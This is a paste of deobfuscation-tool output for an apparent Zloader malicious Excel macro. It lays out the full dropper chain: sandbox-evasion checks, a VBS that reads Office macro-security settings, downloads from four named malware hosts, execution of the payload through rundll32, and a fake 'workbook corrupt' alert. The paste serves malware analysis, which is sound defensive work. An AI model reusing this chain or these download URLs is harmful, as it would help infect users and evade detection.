API tools faq
paste
Advertisement
dissectmalware

Zloader (7dd5eabb0946fd1d11a77ad82143afe2) deobfuscated XLM

dissectmalware
Jun 22nd, 2020
565
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 46.01 KB | None | 0 0
raw download clone embed print report
  1. xlmdeobfuscator -f C:\Users\user\Downloads\order.50785.xls\order.50785.xls
  2.  
  3. _ _______
  4. |\ /|( \ ( )
  5. ( \ / )| ( | () () |
  6. \ (_) / | | | || || |
  7. ) _ ( | | | |(_)| |
  8. / ( ) \ | | | | | |
  9. ( / \ )| (____/\| ) ( |
  10. |/ \|(_______/|/ \|
  11. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  12. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  13. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  14. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  15. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  16. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  17. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  18. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  19.  
  20.  
  21. XLMMacroDeobfuscator(v0.1.5) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  22.  
  23. File: C:\Users\user\Downloads\order.50785.xls\order.50785.xls
  24.  
  25. Unencrypted xls file
  26.  
  27. [Loading Cells]
  28. auto_open: auto_open->'rtNGOD1P843zMOPdOj'!$CO$18233
  29. [Starting Deobfuscation]
  30. CELL:CO18233 , FullEvaluation , FORMULA("=CHAR(R[55791]C[-212])",rtNGOD1P843zMOPdOj$HW$7579:$HW$7659)
  31. CELL:CO18234 , FullEvaluation , ON.TIME(2020-06-22 11:29:16.856277,'rtNGOD1P843zMOPdOj'!DO18935)
  32. CELL:DO18935 , FullEvaluation , "=CLOSE(FALSE)"
  33. CELL:DO18936 , FullEvaluation , "=APP.MAXIMIZE()"
  34. CELL:DO18937 , FullEvaluation , "=IF(GET.WINDOW(7),GOTO(R20022C180),)"
  35. CELL:DO18938 , FullEvaluation , "=IF(GET.WINDOW(20),,GOTO(R20022C180))"
  36. CELL:DO18939 , FullEvaluation , "=IF(GET.WINDOW(23)<3,GOTO(R20022C180),)"
  37. CELL:DO18940 , FullEvaluation , "=IF(GET.WORKSPACE(31),GOTO(R20022C180),)"
  38. CELL:DO18941 , FullEvaluation , "=IF(GET.WORKSPACE(13)<770,GOTO(R20022C180),)"
  39. CELL:DO18942 , FullEvaluation , "=IF(GET.WORKSPACE(14)<390,GOTO(R20022C180),)"
  40. CELL:DO18943 , FullEvaluation , "=IF(GET.WORKSPACE(19),,GOTO(R20022C180))"
  41. CELL:DO18944 , FullEvaluation , "=IF(GET.WORKSPACE(42),,GOTO(R20022C180))"
  42. CELL:DO18945 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R20022C180))"
  43. CELL:DO18946 , FullEvaluation , "=""C:\Users\Public\Oyi.vbs"""
  44. CELL:DO18947 , FullEvaluation , "=""C:\Users\Public\a8FML.txt"""
  45. CELL:DO18948 , FullEvaluation , "=FOPEN(R20033C180,3)"
  46. CELL:DO18949 , FullEvaluation , "=FWRITELN(R20035C180,""On Error Resume Next"")"
  47. CELL:DO18950 , FullEvaluation , "=FWRITELN(R20035C180,""Set fqaeA = CreateObject(""""WScript.Shell"""")"")"
  48. CELL:DO18951 , FullEvaluation , "=FWRITELN(R20035C180,""Set YtU9AS = CreateObject(""""Scripting.FileSystemObject"""")"")"
  49. CELL:DO18952 , FullEvaluation , "=FWRITELN(R20035C180,""Set pZ93bgn = YtU9AS.CreateTextFile(""""""&R20034C180&"""""", True)"")"
  50. CELL:DO18953 , FullEvaluation , "=FWRITELN(R20035C180,""pZ93bgn.WriteLine(fqaeA.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")"
  51. CELL:DO18954 , FullEvaluation , "=FWRITELN(R20035C180,""pZ93bgn.Close"")"
  52. CELL:DO18955 , FullEvaluation , "=FCLOSE(R20035C180)"
  53. CELL:DO18956 , FullEvaluation , "=EXEC(""explorer.exe ""&R20033C180&"""")"
  54. CELL:DO18957 , FullEvaluation , "=WHILE(ISERROR(FILES(R20034C180)))"
  55. CELL:DO18958 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
  56. CELL:DO18959 , FullEvaluation , "=NEXT()"
  57. CELL:DO18960 , FullEvaluation , "=FILE.DELETE(R20033C180)"
  58. CELL:DO18961 , FullEvaluation , "=FOPEN(R20034C180,2)"
  59. CELL:DO18962 , FullEvaluation , "=FREAD(R20048C180,100)"
  60. CELL:DO18963 , FullEvaluation , "=FCLOSE(R20048C180)"
  61. CELL:DO18964 , FullEvaluation , "=FILE.DELETE(R20034C180)"
  62. CELL:DO18965 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""1"",R20049C180)),GOTO(R20022C180),)"
  63. CELL:DO18966 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R37937C135),GOTO(R47050C49))"
  64. CELL:DO18967 , FullEvaluation , ON.TIME(2020-06-22 11:29:17.058154,'rtNGOD1P843zMOPdOj'!M24795)
  65. CELL:M24795 , FullEvaluation , FORMULA("=FORMULA(R[-5861]C[106],R[-4774]C[167])",rtNGOD1P843zMOPdOj$M$24796:$M$24827)
  66. CELL:M24796 , FullEvaluation , FORMULA("=CLOSE(FALSE)",R[-4774]C[167])
  67. CELL:M24797 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",R[-4774]C[167])
  68. CELL:M24798 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R20022C180),)",R[-4774]C[167])
  69. CELL:M24799 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R20022C180))",R[-4774]C[167])
  70. CELL:M24800 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R20022C180),)",R[-4774]C[167])
  71. CELL:M24801 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R20022C180),)",R[-4774]C[167])
  72. CELL:M24802 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R20022C180),)",R[-4774]C[167])
  73. CELL:M24803 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R20022C180),)",R[-4774]C[167])
  74. CELL:M24804 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R20022C180))",R[-4774]C[167])
  75. CELL:M24805 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R20022C180))",R[-4774]C[167])
  76. CELL:M24806 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R20022C180))",R[-4774]C[167])
  77. CELL:M24807 , FullEvaluation , FORMULA("=""C:\Users\Public\Oyi.vbs""",R[-4774]C[167])
  78. CELL:M24808 , FullEvaluation , FORMULA("=""C:\Users\Public\a8FML.txt""",R[-4774]C[167])
  79. CELL:M24809 , FullEvaluation , FORMULA("=FOPEN(R20033C180,3)",R[-4774]C[167])
  80. CELL:M24810 , FullEvaluation , FORMULA("=FWRITELN(R20035C180,""On Error Resume Next"")",R[-4774]C[167])
  81. CELL:M24811 , FullEvaluation , FORMULA("=FWRITELN(R20035C180,""Set fqaeA = CreateObject(""""WScript.Shell"""")"")",R[-4774]C[167])
  82. CELL:M24812 , FullEvaluation , FORMULA("=FWRITELN(R20035C180,""Set YtU9AS = CreateObject(""""Scripting.FileSystemObject"""")"")",R[-4774]C[167])
  83. CELL:M24813 , FullEvaluation , FORMULA("=FWRITELN(R20035C180,""Set pZ93bgn = YtU9AS.CreateTextFile(""""""&R20034C180&"""""", True)"")",R[-4774]C[167])
  84. CELL:M24814 , FullEvaluation , FORMULA("=FWRITELN(R20035C180,""pZ93bgn.WriteLine(fqaeA.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")",R[-4774]C[167])
  85. CELL:M24815 , FullEvaluation , FORMULA("=FWRITELN(R20035C180,""pZ93bgn.Close"")",R[-4774]C[167])
  86. CELL:M24816 , FullEvaluation , FORMULA("=FCLOSE(R20035C180)",R[-4774]C[167])
  87. CELL:M24817 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R20033C180&"""")",R[-4774]C[167])
  88. CELL:M24818 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R20034C180)))",R[-4774]C[167])
  89. CELL:M24819 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",R[-4774]C[167])
  90. CELL:M24820 , FullEvaluation , FORMULA("=NEXT()",R[-4774]C[167])
  91. CELL:M24821 , FullEvaluation , FORMULA("=FILE.DELETE(R20033C180)",R[-4774]C[167])
  92. CELL:M24822 , FullEvaluation , FORMULA("=FOPEN(R20034C180,2)",R[-4774]C[167])
  93. CELL:M24823 , FullEvaluation , FORMULA("=FREAD(R20048C180,100)",R[-4774]C[167])
  94. CELL:M24824 , FullEvaluation , FORMULA("=FCLOSE(R20048C180)",R[-4774]C[167])
  95. CELL:M24825 , FullEvaluation , FORMULA("=FILE.DELETE(R20034C180)",R[-4774]C[167])
  96. CELL:M24826 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""1"",R20049C180)),GOTO(R20022C180),)",R[-4774]C[167])
  97. CELL:M24827 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R37937C135),GOTO(R47050C49))",R[-4774]C[167])
  98. CELL:M24828 , FullEvaluation , ON.TIME(2020-06-22 11:29:17.077142,'rtNGOD1P843zMOPdOj'!FX20023)
  99. CELL:FX20023 , PartialEvaluation , APP.MAXIMIZE()
  100. CELL:FX20024 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R20022C180),)
  101. CELL:FX20025 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R20022C180))
  102. CELL:FX20026 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R20022C180),)
  103. CELL:FX20027 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R20022C180),)
  104. CELL:FX20028 , FullEvaluation , IF(GET.WORKSPACE(13)<770,GOTO(R20022C180),)
  105. CELL:FX20029 , FullEvaluation , IF(GET.WORKSPACE(14)<390,GOTO(R20022C180),)
  106. CELL:FX20030 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R20022C180))
  107. CELL:FX20031 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R20022C180))
  108. CELL:FX20032 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R20022C180))
  109. CELL:FX20032 , FullEvaluation , [TRUE]
  110. CELL:FX20033 , FullEvaluation , "C:\Users\Public\Oyi.vbs"
  111. CELL:FX20034 , FullEvaluation , "C:\Users\Public\a8FML.txt"
  112. CELL:FX20035 , FullEvaluation , FOPEN("C:\Users\Public\Oyi.vbs",3)
  113. CELL:FX20036 , FullEvaluation , FWRITE("C:\Users\Public\Oyi.vbs","On Error Resume Next")
  114. CELL:FX20037 , FullEvaluation , FWRITE("C:\Users\Public\Oyi.vbs","Set fqaeA = CreateObject(""WScript.Shell"")")
  115. CELL:FX20038 , FullEvaluation , FWRITE("C:\Users\Public\Oyi.vbs","Set YtU9AS = CreateObject(""Scripting.FileSystemObject"")")
  116. CELL:FX20039 , FullEvaluation , FWRITE("C:\Users\Public\Oyi.vbs","Set pZ93bgn = YtU9AS.CreateTextFile(""C:\Users\Public\a8FML.txt"", True)")
  117. CELL:FX20040 , FullEvaluation , FWRITE("C:\Users\Public\Oyi.vbs","pZ93bgn.WriteLine(fqaeA.RegRead(""HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security\VBAWarnings""))")
  118. CELL:FX20041 , FullEvaluation , FWRITE("C:\Users\Public\Oyi.vbs","pZ93bgn.Close")
  119. CELL:FX20042 , PartialEvaluation , FCLOSE("C:\Users\Public\Oyi.vbs")
  120. CELL:FX20043 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\Oyi.vbs")
  121. CELL:FX20044 , PartialEvaluation , WHILE(ISERROR(FILES(R20034C180)))
  122. CELL:FX20047 , PartialEvaluation , FILE.DELETE("C:\Users\Public\Oyi.vbs")
  123. CELL:FX20048 , FullEvaluation , FOPEN("C:\Users\Public\a8FML.txt",2)
  124. CELL:FX20049 , PartialEvaluation , FREAD("C:\Users\Public\a8FML.txt",100)
  125. CELL:FX20050 , PartialEvaluation , FCLOSE("C:\Users\Public\a8FML.txt")
  126. CELL:FX20051 , PartialEvaluation , FILE.DELETE("C:\Users\Public\a8FML.txt")
  127. CELL:FX20052 , FullBranching , IF(ISNUMBER(SEARCH("1",R20049C180)),GOTO(R20022C180),)
  128. CELL:FX20052 , FullEvaluation , [TRUE] GOTO(R20022C180)
  129. CELL:FX20022 , End , CLOSE(FALSE)
  130. CELL:FX20052 , FullEvaluation , [FALSE]
  131. CELL:FX20053 , FullBranching , IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))),GOTO(R37937C135),GOTO(R47050C49))
  132. CELL:FX20053 , FullEvaluation , [TRUE] GOTO(R37937C135)
  133. CELL:EE37937 , FullEvaluation , "=""C:\Users\Public\aB3WzTL.html"""
  134. CELL:EE37938 , FullEvaluation , "=""https://thepsaokhue.com/wp-keys.php"""
  135. CELL:EE37939 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R13914C238,R13913C238,0,0)"
  136. CELL:EE37940 , FullEvaluation , "=FILES(R13913C238)"
  137. CELL:EE37941 , FullEvaluation , "=IF(ISERROR(R13916C238),GOTO(R13923C238),)"
  138. CELL:EE37942 , FullEvaluation , "=FOPEN(R13913C238)"
  139. CELL:EE37943 , FullEvaluation , "=FSIZE(R13918C238)"
  140. CELL:EE37944 , FullEvaluation , "=FCLOSE(R13918C238)"
  141. CELL:EE37945 , FullEvaluation , "=IF(R13919C238<40000,,GOTO(R13940C238))"
  142. CELL:EE37946 , FullEvaluation , "=""https://metagro.com.br/wp-keys.php"""
  143. CELL:EE37947 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R13922C238,R13913C238,0,0)"
  144. CELL:EE37948 , FullEvaluation , "=FILES(R13913C238)"
  145. CELL:EE37949 , FullEvaluation , "=IF(ISERROR(R13924C238),GOTO(R13931C238),)"
  146. CELL:EE37950 , FullEvaluation , "=FOPEN(R13913C238)"
  147. CELL:EE37951 , FullEvaluation , "=FSIZE(R13926C238)"
  148. CELL:EE37952 , FullEvaluation , "=FCLOSE(R13926C238)"
  149. CELL:EE37953 , FullEvaluation , "=IF(R13927C238<40000,,GOTO(R13940C238))"
  150. CELL:EE37954 , FullEvaluation , "=""https://loughturnperceidrin.ml/wp-keys.php"""
  151. CELL:EE37955 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R13930C238,R13913C238,0,0)"
  152. CELL:EE37956 , FullEvaluation , "=FILES(R13913C238)"
  153. CELL:EE37957 , FullEvaluation , "=IF(ISERROR(R13932C238),GOTO(R13939C238),)"
  154. CELL:EE37958 , FullEvaluation , "=FOPEN(R13913C238)"
  155. CELL:EE37959 , FullEvaluation , "=FSIZE(R13934C238)"
  156. CELL:EE37960 , FullEvaluation , "=FCLOSE(R13934C238)"
  157. CELL:EE37961 , FullEvaluation , "=IF(R13935C238<40000,,GOTO(R13940C238))"
  158. CELL:EE37962 , FullEvaluation , "=""https://joliroomlides.tk/wp-keys.php"""
  159. CELL:EE37963 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R13938C238,R13913C238,0,0)"
  160. CELL:EE37964 , FullEvaluation , "=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."""
  161. CELL:EE37965 , FullEvaluation , "=ALERT(R13940C238)"
  162. CELL:EE37966 , FullEvaluation , "=""C:\Windows\system32\rundll32.exe"""
  163. CELL:EE37967 , FullEvaluation , "=R13913C238&"",DllRegisterServer"""
  164. CELL:EE37968 , FullEvaluation , "=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R13942C238,R13943C238,0,5)"
  165. CELL:EE37969 , FullEvaluation , "=GOTO(R20022C180)"
  166. CELL:EE37970 , FullEvaluation , ON.TIME(2020-06-22 11:29:18.115500,'rtNGOD1P843zMOPdOj'!D4644)
  167. CELL:D4644 , FullEvaluation , FORMULA("=FORMULA(R[33292]C[131],R[9268]C[234])",rtNGOD1P843zMOPdOj$D$4645:$D$4677)
  168. CELL:D4645 , FullEvaluation , FORMULA("=""C:\Users\Public\aB3WzTL.html""",R[9268]C[234])
  169. CELL:D4646 , FullEvaluation , FORMULA("=""https://thepsaokhue.com/wp-keys.php""",R[9268]C[234])
  170. CELL:D4647 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R13914C238,R13913C238,0,0)",R[9268]C[234])
  171. CELL:D4648 , FullEvaluation , FORMULA("=FILES(R13913C238)",R[9268]C[234])
  172. CELL:D4649 , FullEvaluation , FORMULA("=IF(ISERROR(R13916C238),GOTO(R13923C238),)",R[9268]C[234])
  173. CELL:D4650 , FullEvaluation , FORMULA("=FOPEN(R13913C238)",R[9268]C[234])
  174. CELL:D4651 , FullEvaluation , FORMULA("=FSIZE(R13918C238)",R[9268]C[234])
  175. CELL:D4652 , FullEvaluation , FORMULA("=FCLOSE(R13918C238)",R[9268]C[234])
  176. CELL:D4653 , FullEvaluation , FORMULA("=IF(R13919C238<40000,,GOTO(R13940C238))",R[9268]C[234])
  177. CELL:D4654 , FullEvaluation , FORMULA("=""https://metagro.com.br/wp-keys.php""",R[9268]C[234])
  178. CELL:D4655 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R13922C238,R13913C238,0,0)",R[9268]C[234])
  179. CELL:D4656 , FullEvaluation , FORMULA("=FILES(R13913C238)",R[9268]C[234])
  180. CELL:D4657 , FullEvaluation , FORMULA("=IF(ISERROR(R13924C238),GOTO(R13931C238),)",R[9268]C[234])
  181. CELL:D4658 , FullEvaluation , FORMULA("=FOPEN(R13913C238)",R[9268]C[234])
  182. CELL:D4659 , FullEvaluation , FORMULA("=FSIZE(R13926C238)",R[9268]C[234])
  183. CELL:D4660 , FullEvaluation , FORMULA("=FCLOSE(R13926C238)",R[9268]C[234])
  184. CELL:D4661 , FullEvaluation , FORMULA("=IF(R13927C238<40000,,GOTO(R13940C238))",R[9268]C[234])
  185. CELL:D4662 , FullEvaluation , FORMULA("=""https://loughturnperceidrin.ml/wp-keys.php""",R[9268]C[234])
  186. CELL:D4663 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R13930C238,R13913C238,0,0)",R[9268]C[234])
  187. CELL:D4664 , FullEvaluation , FORMULA("=FILES(R13913C238)",R[9268]C[234])
  188. CELL:D4665 , FullEvaluation , FORMULA("=IF(ISERROR(R13932C238),GOTO(R13939C238),)",R[9268]C[234])
  189. CELL:D4666 , FullEvaluation , FORMULA("=FOPEN(R13913C238)",R[9268]C[234])
  190. CELL:D4667 , FullEvaluation , FORMULA("=FSIZE(R13934C238)",R[9268]C[234])
  191. CELL:D4668 , FullEvaluation , FORMULA("=FCLOSE(R13934C238)",R[9268]C[234])
  192. CELL:D4669 , FullEvaluation , FORMULA("=IF(R13935C238<40000,,GOTO(R13940C238))",R[9268]C[234])
  193. CELL:D4670 , FullEvaluation , FORMULA("=""https://joliroomlides.tk/wp-keys.php""",R[9268]C[234])
  194. CELL:D4671 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R13938C238,R13913C238,0,0)",R[9268]C[234])
  195. CELL:D4672 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",R[9268]C[234])
  196. CELL:D4673 , FullEvaluation , FORMULA("=ALERT(R13940C238)",R[9268]C[234])
  197. CELL:D4674 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",R[9268]C[234])
  198. CELL:D4675 , FullEvaluation , FORMULA("=R13913C238&"",DllRegisterServer""",R[9268]C[234])
  199. CELL:D4676 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R13942C238,R13943C238,0,5)",R[9268]C[234])
  200. CELL:D4677 , FullEvaluation , FORMULA("=GOTO(R20022C180)",R[9268]C[234])
  201. CELL:D4678 , FullEvaluation , ON.TIME(2020-06-22 11:29:18.126493,'rtNGOD1P843zMOPdOj'!ID13913)
  202. CELL:ID13913 , FullEvaluation , "C:\Users\Public\aB3WzTL.html"
  203. CELL:ID13914 , FullEvaluation , "https://thepsaokhue.com/wp-keys.php"
  204. CELL:ID13915 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://thepsaokhue.com/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  205. CELL:ID13916 , PartialEvaluation , FILES("C:\Users\Public\aB3WzTL.html")
  206. CELL:ID13917 , FullBranching , IF(ISERROR(R13916C238),GOTO(R13923C238),)
  207. CELL:ID13917 , FullEvaluation , [TRUE] GOTO(R13923C238)
  208. CELL:ID13923 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://metagro.com.br/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  209. CELL:ID13924 , PartialEvaluation , FILES("C:\Users\Public\aB3WzTL.html")
  210. CELL:ID13925 , FullBranching , IF(ISERROR(R13924C238),GOTO(R13931C238),)
  211. CELL:ID13925 , FullEvaluation , [TRUE] GOTO(R13931C238)
  212. CELL:ID13931 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://loughturnperceidrin.ml/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  213. CELL:ID13932 , PartialEvaluation , FILES("C:\Users\Public\aB3WzTL.html")
  214. CELL:ID13933 , FullBranching , IF(ISERROR(R13932C238),GOTO(R13939C238),)
  215. CELL:ID13933 , FullEvaluation , [TRUE] GOTO(R13939C238)
  216. CELL:ID13939 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://joliroomlides.tk/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  217. CELL:ID13940 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  218. CELL:ID13941 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  219. CELL:ID13942 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  220. CELL:ID13943 , FullEvaluation , "C:\Users\Public\aB3WzTL.html,DllRegisterServer"
  221. CELL:ID13944 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\aB3WzTL.html,DllRegisterServer",0,5)
  222. CELL:ID13945 , FullEvaluation , GOTO(R20022C180)
  223. CELL:FX20022 , End , CLOSE(FALSE)
  224. CELL:ID13933 , FullEvaluation , [FALSE]
  225. CELL:ID13934 , FullEvaluation , FOPEN("C:\Users\Public\aB3WzTL.html",1)
  226. CELL:ID13935 , PartialEvaluation , FSIZE("C:\Users\Public\aB3WzTL.html")
  227. CELL:ID13936 , PartialEvaluation , FCLOSE("C:\Users\Public\aB3WzTL.html")
  228. CELL:ID13937 , FullEvaluation , IF(R13935C238<40000,,GOTO(R13940C238))
  229. CELL:ID13938 , FullEvaluation , "https://joliroomlides.tk/wp-keys.php"
  230. CELL:ID13939 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://joliroomlides.tk/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  231. CELL:ID13940 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  232. CELL:ID13941 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  233. CELL:ID13942 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  234. CELL:ID13943 , FullEvaluation , "C:\Users\Public\aB3WzTL.html,DllRegisterServer"
  235. CELL:ID13944 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\aB3WzTL.html,DllRegisterServer",0,5)
  236. CELL:ID13945 , FullEvaluation , GOTO(R20022C180)
  237. CELL:FX20022 , End , CLOSE(FALSE)
  238. CELL:ID13925 , FullEvaluation , [FALSE]
  239. CELL:ID13926 , FullEvaluation , FOPEN("C:\Users\Public\aB3WzTL.html",1)
  240. CELL:ID13927 , PartialEvaluation , FSIZE("C:\Users\Public\aB3WzTL.html")
  241. CELL:ID13928 , PartialEvaluation , FCLOSE("C:\Users\Public\aB3WzTL.html")
  242. CELL:ID13929 , FullEvaluation , IF(R13927C238<40000,,GOTO(R13940C238))
  243. CELL:ID13930 , FullEvaluation , "https://loughturnperceidrin.ml/wp-keys.php"
  244. CELL:ID13931 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://loughturnperceidrin.ml/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  245. CELL:ID13932 , PartialEvaluation , FILES("C:\Users\Public\aB3WzTL.html")
  246. CELL:ID13933 , FullBranching , IF(ISERROR(R13932C238),GOTO(R13939C238),)
  247. CELL:ID13933 , FullEvaluation , [TRUE] GOTO(R13939C238)
  248. CELL:ID13939 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://joliroomlides.tk/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  249. CELL:ID13940 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  250. CELL:ID13941 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  251. CELL:ID13942 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  252. CELL:ID13943 , FullEvaluation , "C:\Users\Public\aB3WzTL.html,DllRegisterServer"
  253. CELL:ID13933 , FullEvaluation , [FALSE]
  254. CELL:ID13934 , FullEvaluation , FOPEN("C:\Users\Public\aB3WzTL.html",1)
  255. CELL:ID13935 , PartialEvaluation , FSIZE("C:\Users\Public\aB3WzTL.html")
  256. CELL:ID13936 , PartialEvaluation , FCLOSE("C:\Users\Public\aB3WzTL.html")
  257. CELL:ID13937 , FullEvaluation , IF(R13935C238<40000,,GOTO(R13940C238))
  258. CELL:ID13938 , FullEvaluation , "https://joliroomlides.tk/wp-keys.php"
  259. CELL:ID13939 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://joliroomlides.tk/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  260. CELL:ID13940 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  261. CELL:ID13941 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  262. CELL:ID13917 , FullEvaluation , [FALSE]
  263. CELL:ID13918 , FullEvaluation , FOPEN("C:\Users\Public\aB3WzTL.html",1)
  264. CELL:ID13919 , PartialEvaluation , FSIZE("C:\Users\Public\aB3WzTL.html")
  265. CELL:ID13920 , PartialEvaluation , FCLOSE("C:\Users\Public\aB3WzTL.html")
  266. CELL:ID13921 , FullEvaluation , IF(R13919C238<40000,,GOTO(R13940C238))
  267. CELL:ID13922 , FullEvaluation , "https://metagro.com.br/wp-keys.php"
  268. CELL:ID13923 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://metagro.com.br/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  269. CELL:ID13924 , PartialEvaluation , FILES("C:\Users\Public\aB3WzTL.html")
  270. CELL:ID13925 , FullBranching , IF(ISERROR(R13924C238),GOTO(R13931C238),)
  271. CELL:ID13925 , FullEvaluation , [TRUE] GOTO(R13931C238)
  272. CELL:ID13931 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://loughturnperceidrin.ml/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  273. CELL:ID13932 , PartialEvaluation , FILES("C:\Users\Public\aB3WzTL.html")
  274. CELL:ID13933 , FullBranching , IF(ISERROR(R13932C238),GOTO(R13939C238),)
  275. CELL:ID13933 , FullEvaluation , [TRUE] GOTO(R13939C238)
  276. CELL:ID13939 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://joliroomlides.tk/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  277. CELL:ID13933 , FullEvaluation , [FALSE]
  278. CELL:ID13934 , FullEvaluation , FOPEN("C:\Users\Public\aB3WzTL.html",1)
  279. CELL:ID13935 , PartialEvaluation , FSIZE("C:\Users\Public\aB3WzTL.html")
  280. CELL:ID13936 , PartialEvaluation , FCLOSE("C:\Users\Public\aB3WzTL.html")
  281. CELL:ID13937 , FullEvaluation , IF(R13935C238<40000,,GOTO(R13940C238))
